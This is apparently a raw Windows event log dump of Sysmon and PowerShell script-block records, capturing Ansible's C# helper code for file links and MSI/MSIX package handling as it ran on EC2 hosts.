SetLastError = true, CharSet = CharSet.Auto)] private static extern bool CreateSymbolicLink( string lpSymlinkFileName, string lpTargetFileName, UInt32 dwFlags); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool CreateHardLink( string lpFileName, string lpExistingFileName, IntPtr lpSecurityAttributes); public static LinkInfo GetLinkInfo(string linkPath) { FileAttributes attr = File.GetAttributes(linkPath); if (attr.HasFlag(FileAttributes.ReparsePoint)) return GetReparsePointInfo(linkPath); if (!attr.HasFlag(FileAttributes.Directory)) return GetHardLinkInfo(linkPath); return null; } public static void DeleteLink(string linkPath) { bool success; FileAttributes attr = File.GetAttributes(linkPath); if (attr.HasFlag(FileAttributes.Directory)) { success = RemoveDirectory(linkPath); } else { success = DeleteFile(linkPath); } if (!success) throw new LinkUtilWin32Exception(String.Format("Failed to delete link at {0}", linkPath)); } public static void CreateLink(string linkPath, String linkTarget, LinkType linkType) { switch (linkType) { case LinkType.SymbolicLink: UInt32 linkFlags; FileAttributes attr = File.GetAttributes(linkTarget); if (attr.HasFlag(FileAttributes.Directory)) linkFlags = SYMBOLIC_LINK_FLAG_DIRECTORY; else linkFlags = SYMBOLIC_LINK_FLAG_FILE; if (!CreateSymbolicLink(linkPath, linkTarget, linkFlags)) throw new LinkUtilWin32Exception(String.Format("CreateSymbolicLink({0}, {1}, {2}) failed", linkPath, linkTarget, linkFlags)); break; case LinkType.JunctionPoint: CreateJunctionPoint(linkPath, linkTarget); break; case LinkType.HardLink: if (!CreateHardLink(linkPath, linkTarget, IntPtr.Zero)) throw new LinkUtilWin32Exception(String.Format("CreateHardLink({0}, {1}) failed", linkPath, linkTarget)); break; } } private static LinkInfo GetHardLinkInfo(string linkPath) { UInt32 maxPath = 260; List<string> result = new List<string>(); StringBuilder sb = new StringBuilder((int)maxPath); UInt32 stringLength = maxPath; if (!GetVolumePathName(linkPath, sb, ref stringLength)) throw new LinkUtilWin32Exception("GetVolumePathName() failed"); string volume = sb.ToString(); stringLength = maxPath; IntPtr findHandle = FindFirstFileNameW(linkPath, 0, ref stringLength, sb); if (findHandle.ToInt64() != INVALID_HANDLE_VALUE) { try { do { string hardLinkPath = sb.ToString(); if (hardLinkPath.StartsWith("\\")) hardLinkPath = hardLinkPath.Substring(1, hardLinkPath.Length - 1); result.Add(Path.Combine(volume, hardLinkPath)); stringLength = maxPath; } while (FindNextFileNameW(findHandle, ref stringLength, sb)); } finally { FindClose(findHandle); } } if (result.Count > 1) return new LinkInfo { Type = LinkType.HardLink, HardTargets = result.ToArray() }; return null; } private static LinkInfo GetReparsePointInfo(string linkPath) { SafeFileHandle fileHandle = CreateFile( linkPath, FileAccess.Read, FileShare.None, IntPtr.Zero, FileMode.Open, FILE_FLAG_OPEN_REPARSE_POINT | FILE_FLAG_BACKUP_SEMANTICS, IntPtr.Zero); if (fileHandle.IsInvalid) throw new LinkUtilWin32Exception(String.Format("CreateFile({0}) failed", linkPath)); REPARSE_DATA_BUFFER buffer = new REPARSE_DATA_BUFFER(); UInt32 bytesReturned; try { if (!DeviceIoControl( fileHandle, FSCTL_GET_REPARSE_POINT, IntPtr.Zero, 0, out buffer, MAXIMUM_REPARSE_DATA_BUFFER_SIZE, out bytesReturned, IntPtr.Zero)) throw new LinkUtilWin32Exception(String.Format("DeviceIoControl() failed for file at {0}", linkPath)); } finally { fileHandle.Dispose(); } bool isRelative = false; int pathOffset = 0; LinkType linkType; if (buffer.ReparseTag == IO_REPARSE_TAG_SYMLINK) { UInt32 bufferFlags = Convert.ToUInt32(buffer.PathBuffer[0]) + Convert.ToUInt32(buffer.PathBuffer[1]); if (bufferFlags == SYMLINK_FLAG_RELATIVE) isRelative = true; pathOffset = 2; linkType = LinkType.SymbolicLink; } else if (buffer.ReparseTag == IO_REPARSE_TAG_MOUNT_POINT) { linkType = LinkType.JunctionPoint; } else { string errorMessage = String.Format("Invalid Reparse Tag: {0}", buffer.ReparseTag.ToString()); throw new Exception(errorMessage); } string printName = new string(buffer.PathBuffer, (int)(buffer.PrintNameOffset / SIZE_OF_WCHAR) + pathOffset, (int)(buffer.PrintNameLength / SIZE_OF_WCHAR)); string substituteName = new string(buffer.PathBuffer, (int)(buffer.SubstituteNameOffset / SIZE_OF_WCHAR) + pathOffset, (int)(buffer.SubstituteNameLength / SIZE_OF_WCHAR)); // TODO: should we check for \?\UNC\server for convert it to the NT style \\server path // Remove the leading Windows object directory \?\ from the path if present string targetPath = substituteName; if (targetPath.StartsWith("\\??\\")) targetPath = targetPath.Substring(4, targetPath.Length - 4); string absolutePath = targetPath; if (isRelative) absolutePath = Path.GetFullPath(Path.Combine(new FileInfo(linkPath).Directory.FullName, targetPath)); return new LinkInfo { Type = linkType, PrintName = printName, SubstituteName = substituteName, AbsolutePath = absolutePath, TargetPath = targetPath }; } private static void CreateJunctionPoint(string linkPath, string linkTarget) { // We need to create the link as a dir beforehand Directory.CreateDirectory(linkPath); SafeFileHandle fileHandle = CreateFile( linkPath, FileAccess.Write, FileShare.Read | FileShare.Write | FileShare.None, IntPtr.Zero, FileMode.Open, FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, IntPtr.Zero); if (fileHandle.IsInvalid) throw new LinkUtilWin32Exception(String.Format("CreateFile({0}) failed", linkPath)); try { string substituteName = "\\??\\" + Path.GetFullPath(linkTarget); string printName = linkTarget; REPARSE_DATA_BUFFER buffer = new REPARSE_DATA_BUFFER(); buffer.SubstituteNameOffset = 0; buffer.SubstituteNameLength = (UInt16)(substituteName.Length * SIZE_OF_WCHAR); buffer.PrintNameOffset = (UInt16)(buffer.SubstituteNameLength + 2); buffer.PrintNameLength = (UInt16)(printName.Length * SIZE_OF_WCHAR); buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT; buffer.ReparseDataLength = (UInt16)(buffer.SubstituteNameLength + buffer.PrintNameLength + 12); buffer.PathBuffer = new char[MAXIMUM_REPARSE_DATA_BUFFER_SIZE]; byte[] unicodeBytes = Encoding.Unicode.GetBytes(substituteName + "\0" + printName); char[] pathBuffer = Encoding.Unicode.GetChars(unicodeBytes); Array.Copy(pathBuffer, buffer.PathBuffer, pathBuffer.Length); UInt32 bytesReturned; if (!DeviceIoControl( fileHandle, FSCTL_SET_REPARSE_POINT, buffer, (UInt32)(buffer.ReparseDataLength + 8), IntPtr.Zero, 0, out bytesReturned, IntPtr.Zero)) throw new LinkUtilWin32Exception(String.Format("DeviceIoControl() failed to create junction point at {0} to {1}", linkPath, linkTarget)); } finally { fileHandle.Dispose(); } } } } '@ # FUTURE: find a better way to get the _ansible_remote_tmp variable $original_tmp = $env:TMP $original_lib = $env:LIB $remote_tmp = $original_tmp $module_params = Get-Variable -Name complex_args -ErrorAction SilentlyContinue if ($module_params) { if ($module_params.Value.ContainsKey("_ansible_remote_tmp") ) { $remote_tmp = $module_params.Value["_ansible_remote_tmp"] $remote_tmp = [System.Environment]::ExpandEnvironmentVariables($remote_tmp) } } $env:TMP = $remote_tmp $env:LIB = $null Add-Type -TypeDefinition $link_util $env:TMP = $original_tmp $env:LIB = $original_lib # enable the SeBackupPrivilege if it is disabled $state = Get-AnsiblePrivilege -Name SeBackupPrivilege if ($state -eq $false) { Set-AnsiblePrivilege -Name SeBackupPrivilege -Value $true } } Function Get-Link($link_path) { $link_info = [Ansible.LinkUtil]::GetLinkInfo($link_path) return $link_info } Function Remove-Link($link_path) { [Ansible.LinkUtil]::DeleteLink($link_path) } Function New-Link($link_path, $link_target, $link_type) { if (-not (Test-Path -LiteralPath $link_target)) { throw "link_target '$link_target' does not exist, cannot create link" } switch($link_type) { "link" { $type = [Ansible.LinkType]::SymbolicLink } "junction" { if (Test-Path -LiteralPath $link_target -PathType Leaf) { throw "cannot set the target for a junction point to a file" } $type = [Ansible.LinkType]::JunctionPoint } "hard" { if (Test-Path -LiteralPath $link_target -PathType Container) { throw "cannot set the target for a hard link to a directory" } $type = [Ansible.LinkType]::HardLink } default { throw "invalid link_type option $($link_type): expecting link, junction, hard" } } [Ansible.LinkUtil]::CreateLink($link_path, $link_target, $type) } # this line must stay at the bottom to ensure all defined module parts are exported Export-ModuleMember -Alias * -Function * -Cmdlet * 28a6a943-bb74-43e8-ba64-ebe28394e965 13241300x800000000000000072Microsoft-Windows-Sysmon/OperationalEC2AMAZ-TJL6EBNT1101SetValue2024-02-01 20:33:07.386{7A09209E-0003-65BC-0B00-000000004403}592C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Control\Lsa\ProductTypeDWORD (0x00000008)NT AUTHORITY\SYSTEM 614000x8000400000000000166126SystemEC2AMAZ-TJL6EBN0x010010storqosflt2019-02-17T02:00:41.000000000Z203{ "flags" : "0x00000010" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Quota Management" , "instances" : [["244000","0x00000000"]] }{02000000-0008-0000-E9ED-91DD4D55DA01} 614000x8000400000000000166125SystemEC2AMAZ-TJL6EBN0x01005wcifs2021-11-02T00:43:44.000000000Z201{ "flags" : "0x00000014" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Virtualization" , "instances" : [["189900","0x00000000"]] }{02000000-0007-0000-B18B-8FDD4D55DA01} 614000x8000400000000000166124SystemEC2AMAZ-TJL6EBN0x01005luafv2021-01-07T22:49:16.000000000Z201{ "flags" : "0x00000014" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Virtualization" , "instances" : [["135000","0x00000000"]] }{02000000-0006-0000-B18B-8FDD4D55DA01} 614000x8000400000000000166095SystemEC2AMAZ-TJL6EBN0x01009npsvctrig2016-07-16T02:28:33.000000000Z183{ "flags" : "0x00000018" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "(null)" , "instances" : [["46000","0x00000000"]] }{02000000-0005-0000-7615-F3DB4D55DA01} 614000x8000400000000000166094SystemEC2AMAZ-TJL6EBN0x01009FileCrypt2018-08-30T20:44:27.000000000Z197{ "flags" : "0x00000000" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Encryption" , "instances" : [["141100","0x00000000"]] }{02000000-0004-0000-AEA0-DDDB4D55DA01} 614000x8000400000000000166092SystemEC2AMAZ-TJL6EBN0x0009SysmonDrv2024-01-09T11:53:30.000000000Z184{ "flags" : "0x00000038" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "(null)" , "instances" : [["385201","0x00000000"]] }{02000000-0002-0000-0519-B5DB4D55DA01} 614000x8000400000000000166091SystemEC2AMAZ-TJL6EBN0x01003Wof2023-01-06T03:22:00.000000000Z196{ "flags" : "0x00000010" , "registration_version" : "0x00000203" , "tx" : true , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Compression" , "instances" : [["40700","0x00000000"]] }{02000000-0001-0000-D0B6-B2DB4D55DA01} 13241300x800000000000000042Microsoft-Windows-Sysmon/OperationalEC2AMAZ-TJL6EBN-SetValue2024-02-01 20:32:50.215{7A09209E-FFF1-65BB-9603-000000004303}2964C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational\RetentionDWORD (0x00000000)EC2AMAZ-TJL6EBN\Administrator 614000x8000400000000000166040SystemEC2AMAZ-TJL6EBN0x0009SysmonDrv2024-01-09T11:53:30.000000000Z184{ "flags" : "0x00000038" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "(null)" , "instances" : [["385201","0x00000000"]] }{02000000-000A-0000-2499-32CF4D55DA01} 4104152150x0149615Microsoft-Windows-PowerShell/OperationalEC2AMAZ-9JTOML511Function Import-PInvokeCode { param ( [Object] $Module ) Add-CSharpType -AnsibleModule $Module -References @' using Microsoft.Win32.SafeHandles; using System; using System.Collections.Generic; using System.ComponentModel; using System.Runtime.ConstrainedExecution; using System.Runtime.InteropServices; using System.Runtime.InteropServices.ComTypes; using System.Security.Principal; using System.Text; //AssemblyReference -Type System.Security.Principal.IdentityReference -CLR Core namespace Ansible.WinPackage { internal class NativeHelpers { [StructLayout(LayoutKind.Sequential)] public struct PACKAGE_VERSION { public UInt16 Revision; public UInt16 Build; public UInt16 Minor; public UInt16 Major; } [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public struct PACKAGE_ID { public UInt32 reserved; public MsixArchitecture processorArchitecture; public PACKAGE_VERSION version; public string name; public string publisher; public string resourceId; public string publisherId; } } internal class NativeMethods { [DllImport("Ole32.dll", CharSet = CharSet.Unicode)] public static extern UInt32 GetClassFile( [MarshalAs(UnmanagedType.LPWStr)] string szFilename, ref Guid pclsid); [DllImport("Msi.dll")] public static extern UInt32 MsiCloseHandle( IntPtr hAny); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern UInt32 MsiEnumPatchesExW( [MarshalAs(UnmanagedType.LPWStr)] string szProductCode, [MarshalAs(UnmanagedType.LPWStr)] string szUserSid, InstallContext dwContext, PatchState dwFilter, UInt32 dwIndex, StringBuilder szPatchCode, StringBuilder szTargetProductCode, out InstallContext pdwTargetProductContext, StringBuilder szTargetUserSid, ref UInt32 pcchTargetUserSid); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern UInt32 MsiGetPatchInfoExW( [MarshalAs(UnmanagedType.LPWStr)] string szPatchCode, [MarshalAs(UnmanagedType.LPWStr)] string szProductCode, [MarshalAs(UnmanagedType.LPWStr)] string szUserSid, InstallContext dwContext, [MarshalAs(UnmanagedType.LPWStr)] string szProperty, StringBuilder lpValue, ref UInt32 pcchValue); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern UInt32 MsiGetPropertyW( SafeMsiHandle hInstall, [MarshalAs(UnmanagedType.LPWStr)] string szName, StringBuilder szValueBuf, ref UInt32 pcchValueBuf); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern UInt32 MsiGetSummaryInformationW( IntPtr hDatabase, [MarshalAs(UnmanagedType.LPWStr)] string szDatabasePath, UInt32 uiUpdateCount, out SafeMsiHandle phSummaryInfo); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern UInt32 MsiOpenPackageExW( [MarshalAs(UnmanagedType.LPWStr)] string szPackagePath, UInt32 dwOptions, out SafeMsiHandle hProduct); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern InstallState MsiQueryProductStateW( [MarshalAs(UnmanagedType.LPWStr)] string szProduct); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern UInt32 MsiSummaryInfoGetPropertyW( SafeHandle hSummaryInfo, UInt32 uiProperty, out UInt32 puiDataType, out Int32 piValue, ref System.Runtime.InteropServices.ComTypes.FILETIME pftValue, StringBuilder szValueBuf, ref UInt32 pcchValueBuf); [DllImport("Kernel32.dll", CharSet = CharSet.Unicode)] public static extern UInt32 PackageFullNameFromId( NativeHelpers.PACKAGE_ID packageId, ref UInt32 packageFamilyNameLength, StringBuilder packageFamilyName); } [Flags] public enum InstallContext : uint { None = 0x00000000, UserManaged = 0x00000001, UserUnmanaged = 0x00000002, Machine = 0x00000004, AllUserManaged = 0x00000008, All = UserManaged | UserUnmanaged | Machine, } public enum InstallState : int { NotUsed = -7, BadConfig = -6, Incomplete = -5, SourceAbsent = -4, MoreData = -3, InvalidArg = -2, Unknown = -1, Broken = 0, Advertised = 1, Absent = 2, Local = 3, Source = 4, Default = 5, } public enum MsixArchitecture : uint { X86 = 0, Arm = 5, X64 = 9, Neutral = 11, Arm64 = 12, } [Flags] public enum PatchState : uint { Invalid = 0x00000000, Applied = 0x00000001, Superseded = 0x00000002, Obsoleted = 0x00000004, Registered = 0x00000008, All = Applied | Superseded | Obsoleted | Registered, } public class SafeMsiHandle : SafeHandleZeroOrMinusOneIsInvalid { public SafeMsiHandle() : base(true) { } [ReliabilityContract(Consistency.WillNotCorruptState, Cer.MayFail)] protected override bool ReleaseHandle() { UInt32 res = NativeMethods.MsiCloseHandle(handle); return res == 0; } } public class PatchInfo { public string PatchCode; public string ProductCode; public InstallContext Context; public SecurityIdentifier UserSid; } public class MsixHelper { public static string GetPackageFullName(string identity, string version, string publisher, MsixArchitecture architecture, string resourceId) { string[] versionSplit = version.Split(new char[] {'.'}, 4); NativeHelpers.PACKAGE_ID id = new NativeHelpers.PACKAGE_ID() { processorArchitecture = architecture, version = new NativeHelpers.PACKAGE_VERSION() { Revision = Convert.ToUInt16(versionSplit.Length > 3 ? versionSplit[3] : "0"), Build = Convert.ToUInt16(versionSplit.Length > 2 ? versionSplit[2] : "0"), Minor = Convert.ToUInt16(versionSplit.Length > 1 ? versionSplit[1] : "0"), Major = Convert.ToUInt16(versionSplit[0]), }, name = identity, publisher = publisher, resourceId = resourceId, }; UInt32 fullNameLength = 0; UInt32 res = NativeMethods.PackageFullNameFromId(id, ref fullNameLength, null); if (res != 122) // ERROR_INSUFFICIENT_BUFFER throw new Win32Exception((int)res); StringBuilder fullName = new StringBuilder((int)fullNameLength); res = NativeMethods.PackageFullNameFromId(id, ref fullNameLength, fullName); if (res != 0) throw new Win32Exception((int)res); return fullName.ToString(); } } public class MsiHelper { public static UInt32 SUMMARY_PID_TEMPLATE = 7; public static UInt32 SUMMARY_PID_REVNUMBER = 9; private static Guid MSI_CLSID = new Guid("000c1084-0000-0000-c000-000000000046"); private static Guid MSP_CLSID = new Guid("000c1086-0000-0000-c000-000000000046"); public static IEnumerable<PatchInfo> EnumPatches(string productCode, string userSid, InstallContext context, PatchState filter) { // PowerShell -> .NET, $null for a string parameter becomes an empty string, make sure we convert back. productCode = String.IsNullOrEmpty(productCode) ? null : productCode; userSid = String.IsNullOrEmpty(userSid) ? null : userSid; UInt32 idx = 0; while (true) { StringBuilder targetPatchCode = new StringBuilder(39); StringBuilder targetProductCode = new StringBuilder(39); InstallContext targetContext; StringBuilder targetUserSid = new StringBuilder(0); UInt32 targetUserSidLength = 0; UInt32 res = NativeMethods.MsiEnumPatchesExW(productCode, userSid, context, filter, idx, targetPatchCode, targetProductCode, out targetContext, targetUserSid, ref targetUserSidLength); SecurityIdentifier sid = null; if (res == 0x000000EA) // ERROR_MORE_DATA { targetUserSidLength++; targetUserSid.EnsureCapacity((int)targetUserSidLength); res = NativeMethods.MsiEnumPatchesExW(productCode, userSid, context, filter, idx, targetPatchCode, targetProductCode, out targetContext, targetUserSid, ref targetUserSidLength); sid = new SecurityIdentifier(targetUserSid.ToString()); } if (res == 0x00000103) // ERROR_NO_MORE_ITEMS break; else if (res != 0) throw new Win32Exception((int)res); yield return new PatchInfo() { PatchCode = targetPatchCode.ToString(), ProductCode = targetProductCode.ToString(), Context = targetContext, UserSid = sid, }; idx++; } } public static string GetPatchInfo(string patchCode, string productCode, string userSid, InstallContext context, string property) { // PowerShell -> .NET, $null for a string parameter becomes an empty string, make sure we convert back. userSid = String.IsNullOrEmpty(userSid) ? null : userSid; StringBuilder buffer = new StringBuilder(0); UInt32 bufferLength = 0; NativeMethods.MsiGetPatchInfoExW(patchCode, productCode, userSid, context, property, buffer, ref bufferLength); bufferLength++; buffer.EnsureCapacity((int)bufferLength); UInt32 res = NativeMethods.MsiGetPatchInfoExW(patchCode, productCode, userSid, context, property, buffer, ref bufferLength); if (res != 0) throw new Win32Exception((int)res); return buffer.ToString(); } public static string GetProperty(SafeMsiHandle productHandle, string property) { StringBuilder buffer = new StringBuilder(0); UInt32 bufferLength = 0; NativeMethods.MsiGetPropertyW(productHandle, property, buffer, ref bufferLength); // Make sure we include the null byte char at the end. bufferLength += 1; buffer.EnsureCapacity((int)bufferLength); UInt32 res = NativeMethods.MsiGetPropertyW(productHandle, property, buffer, ref bufferLength); if (res != 0) throw new Win32Exception((int)res); return buffer.ToString(); } public static SafeMsiHandle GetSummaryHandle(string databasePath) { SafeMsiHandle summaryInfo = null; UInt32 res = NativeMethods.MsiGetSummaryInformationW(IntPtr.Zero, databasePath, 0, out summaryInfo); if (res != 0) throw new Win32Exception((int)res); return summaryInfo; } public static string GetSummaryPropertyString(SafeMsiHandle summaryHandle, UInt32 propertyId) { UInt32 dataType = 0; Int32 intPropValue = 0; System.Runtime.InteropServices.ComTypes.FILETIME propertyFiletime = new System.Runtime.InteropServices.ComTypes.FILETIME(); StringBuilder buffer = new StringBuilder(0); UInt32 bufferLength = 0; NativeMethods.MsiSummaryInfoGetPropertyW(summaryHandle, propertyId, out dataType, out intPropValue, ref propertyFiletime, buffer, ref bufferLength); // Make sure we include the null byte char at the end. bufferLength += 1; buffer.EnsureCapacity((int)bufferLength); UInt32 res = NativeMethods.MsiSummaryInfoGetPropertyW(summaryHandle, propertyId, out dataType, out intPropValue, ref propertyFiletime, buffer, ref bufferLength); if (res != 0) throw new Win32Exception((int)res); return buffer.ToString(); } public static bool IsMsi(string filename) { return GetClsid(filename) == MSI_CLSID; } public static bool IsMsp(string filename) { return GetClsid(filename) == MSP_CLSID; } public static SafeMsiHandle OpenPackage(string packagePath, bool ignoreMachineState) { SafeMsiHandle packageHandle = null; UInt32 options = 0; if (ignoreMachineState) options |= 1; // MSIOPENPACKAGEFLAGS_IGNOREMACHINESTATE UInt32 res = NativeMethods.MsiOpenPackageExW(packagePath, options, out packageHandle); if (res != 0) throw new Win32Exception((int)res); return packageHandle; } public static InstallState QueryProductState(string productCode) { return NativeMethods.MsiQueryProductStateW(productCode); } private static Guid GetClsid(string filename) { Guid clsid = Guid.Empty; NativeMethods.GetClassFile(filename, ref clsid); return clsid; } } } '@ }66d81258-b5eb-4b53-83f8-4445d9c9cfff 4104132150x0149605Microsoft-Windows-PowerShell/OperationalEC2AMAZ-9JTOML513#!powershell # Copyright: (c) 2014, Trond Hindenes <trond@hindenes.com>, and others # Copyright: (c) 2017, Ansible Project # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) # AccessToken should be removed once the username/password options are gone #AnsibleRequires -CSharpUtil Ansible.AccessToken #AnsibleRequires -CSharpUtil Ansible.Basic #Requires -Module Ansible.ModuleUtils.AddType #AnsibleRequires -PowerShell ..module_utils.Process #AnsibleRequires -PowerShell ..module_utils.WebRequest Function Import-PInvokeCode { param ( [Object] $Module ) Add-CSharpType -AnsibleModule $Module -References @' using Microsoft.Win32.SafeHandles; using System; using System.Collections.Generic; using System.ComponentModel; using System.Runtime.ConstrainedExecution; using System.Runtime.InteropServices; using System.Runtime.InteropServices.ComTypes; using System.Security.Principal; using System.Text; //AssemblyReference -Type System.Security.Principal.IdentityReference -CLR Core namespace Ansible.WinPackage { internal class NativeHelpers { [StructLayout(LayoutKind.Sequential)] public struct PACKAGE_VERSION { public UInt16 Revision; public UInt16 Build; public UInt16 Minor; public UInt16 Major; } [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public struct PACKAGE_ID { public UInt32 reserved; public MsixArchitecture processorArchitecture; public PACKAGE_VERSION version; public string name; public string publisher; public string resourceId; public string publisherId; } } internal class NativeMethods { [DllImport("Ole32.dll", CharSet = CharSet.Unicode)] public static extern UInt32 GetClassFile( [MarshalAs(UnmanagedType.LPWStr)] string szFilename, ref Guid pclsid); [DllImport("Msi.dll")] public static extern UInt32 MsiCloseHandle( IntPtr hAny); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern UInt32 MsiEnumPatchesExW( [MarshalAs(UnmanagedType.LPWStr)] string szProductCode, [MarshalAs(UnmanagedType.LPWStr)] string szUserSid, InstallContext dwContext, PatchState dwFilter, UInt32 dwIndex, StringBuilder szPatchCode, StringBuilder szTargetProductCode, out InstallContext pdwTargetProductContext, StringBuilder szTargetUserSid, ref UInt32 pcchTargetUserSid); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern UInt32 MsiGetPatchInfoExW( [MarshalAs(UnmanagedType.LPWStr)] string szPatchCode, [MarshalAs(UnmanagedType.LPWStr)] string szProductCode, [MarshalAs(UnmanagedType.LPWStr)] string szUserSid, InstallContext dwContext, [MarshalAs(UnmanagedType.LPWStr)] string szProperty, StringBuilder lpValue, ref UInt32 pcchValue); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern UInt32 MsiGetPropertyW( SafeMsiHandle hInstall, [MarshalAs(UnmanagedType.LPWStr)] string szName, StringBuilder szValueBuf, ref UInt32 pcchValueBuf); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern UInt32 MsiGetSummaryInformationW( IntPtr hDatabase, [MarshalAs(UnmanagedType.LPWStr)] string szDatabasePath, UInt32 uiUpdateCount, out SafeMsiHandle phSummaryInfo); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern UInt32 MsiOpenPackageExW( [MarshalAs(UnmanagedType.LPWStr)] string szPackagePath, UInt32 dwOptions, out SafeMsiHandle hProduct); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern InstallState MsiQueryProductStateW( [MarshalAs(UnmanagedType.LPWStr)] string szProduct); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern UInt32 MsiSummaryInfoGetPropertyW( SafeHandle hSummaryInfo, UInt32 uiProperty, out UInt32 puiDataType, out Int32 piValue, ref System.Runtime.InteropServices.ComTypes.FILETIME pftValue, StringBuilder szValueBuf, ref UInt32 pcchValueBuf); [DllImport("Kernel32.dll", CharSet = CharSet.Unicode)] public static extern UInt32 PackageFullNameFromId( NativeHelpers.PACKAGE_ID packageId, ref UInt32 packageFamilyNameLength, StringBuilder packageFamilyName); } [Flags] public enum InstallContext : uint { None = 0x00000000, UserManaged = 0x00000001, UserUnmanaged = 0x00000002, Machine = 0x00000004, AllUserManaged = 0x00000008, All = UserManaged | UserUnmanaged | Machine, } public enum InstallState : int { NotUsed = -7, BadConfig = -6, Incomplete = -5, SourceAbsent = -4, MoreData = -3, InvalidArg = -2, Unknown = -1, Broken = 0, Advertised = 1, Absent = 2, Local = 3, Source = 4, Default = 5, } public enum MsixArchitecture : uint { X86 = 0, Arm = 5, X64 = 9, Neutral = 11, Arm64 = 12, } [Flags] public enum PatchState : uint { Invalid = 0x00000000, Applied = 0x00000001, Superseded = 0x00000002, Obsoleted = 0x00000004, Registered = 0x00000008, All = Applied | Superseded | Obsoleted | Registered, } public class SafeMsiHandle : SafeHandleZeroOrMinusOneIsInvalid { public SafeMsiHandle() : base(true) { } [ReliabilityContract(Consistency.WillNotCorruptState, Cer.MayFail)] protected override bool ReleaseHandle() { UInt32 res = NativeMethods.MsiCloseHandle(handle); return res == 0; } } public class PatchInfo { public string PatchCode; public string ProductCode; public InstallContext Context; public SecurityIdentifier UserSid; } public class MsixHelper { public static string GetPackageFullName(string identity, string version, string publisher, MsixArchitecture architecture, string resourceId) { string[] versionSplit = version.Split(new char[] {'.'}, 4); NativeHelpers.PACKAGE_ID id = new NativeHelpers.PACKAGE_ID() { processorArchitecture = architecture, version = new NativeHelpers.PACKAGE_VERSION() { Revision = Convert.ToUInt16(versionSplit.Length > 3 ? versionSplit[3] : "0"), Build = Convert.ToUInt16(versionSplit.Length > 2 ? versionSplit[2] : "0"), Minor = Convert.ToUInt16(versionSplit.Length > 1 ? versionSplit[1] : "0"), Major = Convert.ToUInt16(versionSplit[0]), }, name = identity, publisher = publisher, resourceId = resourceId, }; UInt32 fullNameLength = 0; UInt32 res = NativeMethods.PackageFullNameFromId(id, ref fullNameLength, null); if (res != 122) // ERROR_INSUFFICIENT_BUFFER throw new Win32Exception((int)res); StringBuilder fullName = new StringBuilder((int)fullNameLength); res = NativeMethods.PackageFullNameFromId(id, ref fullNameLength, fullName); if (res != 0) throw new Win32Exception((int)res); return fullName.ToString(); } } public class MsiHelper { public static UInt32 SUMMARY_PID_TEMPLATE = 7; public static UInt32 SUMMARY_PID_REVNUMBER = 9; private static Guid MSI_CLSID = new Guid("000c1084-0000-0000-c000-000000000046"); private static Guid MSP_CLSID = new Guid("000c1086-0000-0000-c000-000000000046"); public static IEnumerable<PatchInfo> EnumPatches(string productCode, string userSid, InstallContext context, PatchState filter) { // PowerShell -> .NET, $null for a string parameter becomes an empty string, make sure we convert back. productCode = String.IsNullOrEmpty(productCode) ? null : productCode; userSid = String.IsNullOrEmpty(userSid) ? null : userSid; UInt32 idx = 0; while (true) { StringBuilder targetPatchCode = new StringBuilder(39); StringBuilder targetProductCode = new StringBuilder(39); InstallContext targetContext; StringBuilder targetUserSid = new StringBuilder(0); UInt32 targetUserSidLength = 0; UInt32 res = NativeMethods.MsiEnumPatchesExW(productCode, userSid, context, filter, idx, targetPatchCode, targetProductCode, out targetContext, targetUserSid, ref targetUserSidLength); SecurityIdentifier sid = null; if (res == 0x000000EA) // ERROR_MORE_DATA { targetUserSidLength++; targetUserSid.EnsureCapacity((int)targetUserSidLength); res = NativeMethods.MsiEnumPatchesExW(productCode, userSid, context, filter, idx, targetPatchCode, targetProductCode, out targetContext, targetUserSid, ref targetUserSidLength); sid = new SecurityIdentifier(targetUserSid.ToString()); } if (res == 0x00000103) // ERROR_NO_MORE_ITEMS break; else if (res != 0) throw new Win32Exception((int)res); yield return new PatchInfo() { PatchCode = targetPatchCode.ToString(), ProductCode = targetProductCode.ToString(), Context = targetContext, UserSid = sid, }; idx++; } } public static string GetPatchInfo(string patchCode, string productCode, string userSid, InstallContext context, string property) { // PowerShell -> .NET, $null for a string parameter becomes an empty string, make sure we convert back. userSid = String.IsNullOrEmpty(userSid) ? null : userSid; StringBuilder buffer = new StringBuilder(0); UInt32 bufferLength = 0; NativeMethods.MsiGetPatchInfoExW(patchCode, productCode, userSid, context, property, buffer, ref bufferLength); bufferLength++; buffer.EnsureCapacity((int)bufferLength); UInt32 res = 